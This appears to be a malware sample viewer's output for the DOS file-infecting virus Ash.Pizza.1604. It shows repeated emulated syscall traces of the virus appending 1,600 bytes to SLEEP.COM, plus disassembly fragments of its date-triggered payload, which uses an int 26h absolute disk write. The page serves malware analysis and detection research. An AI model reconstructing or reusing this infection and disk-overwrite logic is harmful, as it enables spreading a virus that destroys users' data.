Sample viewer

vx.netlux.org/Virus.DOS.Ash.Pizza.1604

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:12:13.814422986Z 26 PC: 12ace | Set disk transfer address
2018-12-17T22:12:13.816419168Z 78 PC: 12b27 | Find first file
2018-12-17T22:12:13.822556491Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:12:13.830150842Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:12:13.837494672Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:12:13.839160581Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:12:13.842693372Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-17T22:12:13.869827647Z 66 PC: 12b94 | Move file pointer
2018-12-17T22:12:13.871116237Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:12:13.877363177Z 62 PC: 12b1b | Close file
2018-12-17T22:12:13.885891131Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.889483848Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.892759364Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.895581694Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.898449681Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.901141466Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.903505771Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.90665596Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.908790299Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.911284085Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.922684269Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.925353972Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.927639031Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.931260255Z 61 PC: 12b33 | Open file (Filename = '')
2018-12-17T22:12:13.933420576Z 79 PC: 12b27 | Find next file
2018-12-17T22:12:13.936074404Z 59 PC: 12be9 | Change current directory
2018-12-17T22:12:13.941518385Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
0x12bfb: jne 0x12c07
0x12bfd: cmp dh, 7
0x12c00: jne 0x12c07
0x12c02: xor ax, ax
0x12c04: jmp 0x12c25
0x12c06: nop
0x12c07: mov ah, 0x2c
0x12c09: int 0x21
0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
2018-12-17T22:12:13.943897054Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax
0x12c25: mov dx, ax
0x12c27: mov cx, 1
0x12c2a: xor bx, bx
0x12c2c: mov ah, 0x19
0x12c2e: int 0x21
0x12c30: int 0x26
0x12c32: mov bx, 0x3df
2018-12-17T22:12:13.946293482Z 44 PC: 12c39 | Get time 0x12c39: inc dh
0x12c3b: cmp dh, byte ptr [0x407]
0x12c3f: jl 0x12c47
0x12c41: sub dh, byte ptr [0x407]
0x12c45: jmp 0x12c3b
0x12c47: mov al, dh
0x12c49: mov cl, al
0x12c4b: cwde
0x12c4c: shl ax, 1
0x12c4e: add bx, ax
0x12c50: mov si, word ptr [bx]
0x12c52: mov ch, byte ptr [si - 1]
0x12c55: mov dx, si
0x12c57: mov ah, 9
0x12c59: int 0x21
0x12c5b: cmp ch, 0
0x12c5e: je 0x12c89
0x12c60: cmp ch, 1
0x12c63: je 0x12c63
0x12c65: cmp ch, 2
2018-12-17T22:12:13.949722257Z 9 PC: 12c5b | Display string (String= 'eFp�pF� �Fp� n � ��p��� �pZp�5p��CON Gp��!AUX Yp���PRN kp��9CLOCK')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:00.821553274Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:00.82322091Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:00.829754084Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:00.836841493Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:00.851275727Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:00.85310117Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:00.856761424Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:00.874871178Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:00.877469947Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:00.884989391Z 62 PC: 12b1b | Close file
2018-12-25T11:46:00.894406662Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.898770845Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.901488954Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.904563571Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.907854094Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.910719693Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.913025738Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.920203907Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.922476317Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.925769754Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.928537646Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.931105717Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.933289667Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.936999527Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:00.944931662Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:00.947586222Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:00.952426108Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
0x12bfb: jne 0x12c07
0x12bfd: cmp dh, 7
0x12c00: jne 0x12c07
0x12c02: xor ax, ax
0x12c04: jmp 0x12c25
0x12c06: nop
0x12c07: mov ah, 0x2c
0x12c09: int 0x21
0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
2018-12-25T11:46:00.955038612Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax
0x12c25: mov dx, ax
0x12c27: mov cx, 1
0x12c2a: xor bx, bx
0x12c2c: mov ah, 0x19
0x12c2e: int 0x21
0x12c30: int 0x26
0x12c32: mov bx, 0x3df
2018-12-25T11:46:00.957299998Z 25 PC: 12c30 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.380545558Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:01.396171Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:01.402786088Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.409937395Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:01.417278145Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:01.41868918Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.422932507Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:01.439779381Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:01.445320867Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.45224676Z 62 PC: 12b1b | Close file
2018-12-25T11:46:01.460907271Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.463730642Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.465961559Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.468624048Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.471345616Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.473086452Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.474580223Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.477378481Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.47958457Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.482079279Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.484735963Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.487148574Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.489289398Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.493370663Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.495757606Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.498129658Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:01.503436239Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
0x12bfb: jne 0x12c07
0x12bfd: cmp dh, 7
0x12c00: jne 0x12c07
0x12c02: xor ax, ax
0x12c04: jmp 0x12c25
0x12c06: nop
0x12c07: mov ah, 0x2c
0x12c09: int 0x21
0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
2018-12-25T11:46:01.505918956Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax
0x12c25: mov dx, ax
0x12c27: mov cx, 1
0x12c2a: xor bx, bx
0x12c2c: mov ah, 0x19
0x12c2e: int 0x21
0x12c30: int 0x26
0x12c32: mov bx, 0x3df
2018-12-25T11:46:01.508188657Z 25 PC: 12c30 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.642094627Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:01.643749636Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:01.650535541Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.656757854Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:01.672967459Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:01.674293028Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.677489426Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:01.694462062Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:01.695794056Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:01.702060292Z 62 PC: 12b1b | Close file
2018-12-25T11:46:01.710082465Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.713663805Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.715619952Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.718525604Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.721387861Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.723822014Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.725885804Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.733569361Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.736168681Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.738550703Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.753775697Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.756530752Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.758842019Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.762052136Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:01.764400148Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:01.766819311Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:01.771706672Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
0x12bfb: jne 0x12c07
0x12bfd: cmp dh, 7
0x12c00: jne 0x12c07
0x12c02: xor ax, ax
0x12c04: jmp 0x12c25
0x12c06: nop
0x12c07: mov ah, 0x2c
0x12c09: int 0x21
0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
2018-12-25T11:46:01.77383406Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax
0x12c25: mov dx, ax
0x12c27: mov cx, 1
0x12c2a: xor bx, bx
0x12c2c: mov ah, 0x19
0x12c2e: int 0x21
0x12c30: int 0x26
0x12c32: mov bx, 0x3df
2018-12-25T11:46:01.775853299Z 44 PC: 12c39 | Get time 0x12c39: inc dh
0x12c3b: cmp dh, byte ptr [0x407]
0x12c3f: jl 0x12c47
0x12c41: sub dh, byte ptr [0x407]
0x12c45: jmp 0x12c3b
0x12c47: mov al, dh
0x12c49: mov cl, al
0x12c4b: cwde
0x12c4c: shl ax, 1
0x12c4e: add bx, ax
0x12c50: mov si, word ptr [bx]
0x12c52: mov ch, byte ptr [si - 1]
0x12c55: mov dx, si
0x12c57: mov ah, 9
0x12c59: int 0x21
0x12c5b: cmp ch, 0
0x12c5e: je 0x12c89
0x12c60: cmp ch, 1
0x12c63: je 0x12c63
0x12c65: cmp ch, 2
2018-12-25T11:46:01.778258483Z 9 PC: 12c5b | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:02.075232107Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:46:02.07707694Z 78 PC: 12b27 | Find first file
2018-12-25T11:46:02.0836446Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:02.090093109Z 63 PC: 12b42 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:46:02.099300885Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:02.101225Z 64 PC: 12b70 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:02.105099403Z 64 PC: 12a72 | Write file or device (Write 1600 bytes on handle 5)
2018-12-25T11:46:02.12039646Z 66 PC: 12b94 | Move file pointer
2018-12-25T11:46:02.122089447Z 64 PC: 12bb6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:46:02.128746213Z 62 PC: 12b1b | Close file
2018-12-25T11:46:02.137539456Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.140450615Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.142637385Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.144929445Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.147059942Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.149350714Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.151188198Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.155080861Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.157105822Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.15937478Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.162160777Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.164639382Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.167116647Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.170328155Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:46:02.172750722Z 79 PC: 12b27 | Find next file (See above)
2018-12-25T11:46:02.175880189Z 59 PC: 12be9 | Change current directory
2018-12-25T11:46:02.181524067Z 42 PC: 12bf8 | Get date 0x12bf8: cmp dl, 4
0x12bfb: jne 0x12c07
0x12bfd: cmp dh, 7
0x12c00: jne 0x12c07
0x12c02: xor ax, ax
0x12c04: jmp 0x12c25
0x12c06: nop
0x12c07: mov ah, 0x2c
0x12c09: int 0x21
0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
2018-12-25T11:46:02.184747061Z 44 PC: 12c0b | Get time 0x12c0b: or cl, cl
0x12c0d: jne 0x12c32
0x12c0f: cmp ch, 6
0x12c12: jge 0x12c32
0x12c14: add cl, ch
0x12c16: mov ax, cx
0x12c18: cwde
0x12c19: add al, dh
0x12c1b: adc al, dl
0x12c1d: adc ah, 0
0x12c20: or ax, ax
0x12c22: jne 0x12c25
0x12c24: inc ax
0x12c25: mov dx, ax
0x12c27: mov cx, 1
0x12c2a: xor bx, bx
0x12c2c: mov ah, 0x19
0x12c2e: int 0x21
0x12c30: int 0x26
0x12c32: mov bx, 0x3df
2018-12-25T11:46:02.187444965Z 44 PC: 12c39 | Get time 0x12c39: inc dh
0x12c3b: cmp dh, byte ptr [0x407]
0x12c3f: jl 0x12c47
0x12c41: sub dh, byte ptr [0x407]
0x12c45: jmp 0x12c3b
0x12c47: mov al, dh
0x12c49: mov cl, al
0x12c4b: cwde
0x12c4c: shl ax, 1
0x12c4e: add bx, ax
0x12c50: mov si, word ptr [bx]
0x12c52: mov ch, byte ptr [si - 1]
0x12c55: mov dx, si
0x12c57: mov ah, 9
0x12c59: int 0x21
0x12c5b: cmp ch, 0
0x12c5e: je 0x12c89
0x12c60: cmp ch, 1
0x12c63: je 0x12c63
0x12c65: cmp ch, 2
2018-12-25T11:46:02.190776261Z 9 PC: 12c5b | Display string (Could not find end pointer)